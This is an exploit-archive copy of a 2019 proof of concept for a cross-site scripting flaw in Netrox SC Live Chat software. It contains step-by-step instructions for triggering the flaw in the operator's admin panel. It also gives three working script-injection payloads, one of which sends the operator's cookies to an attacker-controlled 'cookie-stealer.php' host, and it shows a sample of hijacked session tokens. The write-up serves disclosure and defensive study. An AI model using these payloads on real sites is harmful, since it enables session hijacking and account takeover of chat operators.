Advertisement






Netrox SC Live Chat Software for websites Reflected XSS Injection

CVE Category Price Severity
CWE-79 $500 High
Author Risk Exploitation Type Date
Unknown High Remote 2019-08-09
CPE
cpe:cpe:/a:netrox:sc_live_chat_software:1.0
CVSS EPSS EPSSP
Not available 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019080015

Below is a copy:

Netrox SC Live Chat Software for websites Reflected XSS Injection
/*!
* # Exploit Title: Netrox SC Live Chat Software for websites Reflected XSS Injection
* # Google Dork: -
* # Date: 2019/08/02
* # Author: m0ze
* # Vendor Homepage: https://www.netroxsc.com/ || https://www.netroxsc.ru/
* # Software Link: https://www.netroxsc.com/ || https://www.netroxsc.ru/ || https://sys.netrox.sc
* # Version: -
* # Tested on: NginX
* # CVE: -
* # CWE: CWE-79
*/

::- Details & Description -::
~ The Netrox SC Live Chat Software for websites web-application is vulnerable to Reflected XSS injection that allows an attacker to inject JavaScript/HTML code into the live chat with authorized operator/admin, redirect operator/admin to another website or steal cookies and hijack an active admin/operator session.

::- Demo Website -::
~ Registration: https://sys.netrox.sc/signup
~ Frontend: https://www.netroxsc.com/ || https://www.netroxsc.ru/ || ur own domain for test purposes
~ Backend (auth): https://sys.netrox.sc/enter

::- Special Note -::
~ To reproduce described issue and install the demo chat, you need a domain and ability to create an HTML page on it.
~ Keep in mind that ur payload will work UNTILL u send it to chat. In other words, keep the chat open IN A TYPING STATE.

::- PoC Links -::
~ -

::- PoC [Persistent XSS Injection] -::
~ Register a new account https://sys.netrox.sc/signup and configure chat/account settings, then go to https://sys.netrox.sc/t_site_theme_simple/show page and press the System code button. Copy/paste provided code to ur demo website page (f.e. blank index.html page), save changes and ur demo website must be ready for some tests. Then go to ur demo website page with Netrox SC Live Chat widget, open chat and start typing ur payload (check examples below) but DON'T SEND THE MESSAGE in chat. Then go to the admin area https://sys.netrox.sc/t_workdesk and double click on a new chat alert, wait ~3 seconds and ur payload will work.
~ Example #0: <h1 onmouseover=alert(`m0ze`);>m0ze</h1>
~ Example #1: <img src=x onerror=(alert)(document.cookie);window.location='https://twitter.com/m0ze_ru';//">
~ Example #2: <img src=x onerror=alert('OK');this.src='https://your.domain.tld/cookie-stealer.php?c='+document.cookie>

::- PoC [Hijacked Session Cookies Sample] -::
NXSID=1q36j5aq6pzd408gha0bg8zn14;
auth_token=4eq848d1330m3efd6272301338db2588d2f7d4cnef5293213dc74d99ded7713b;

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.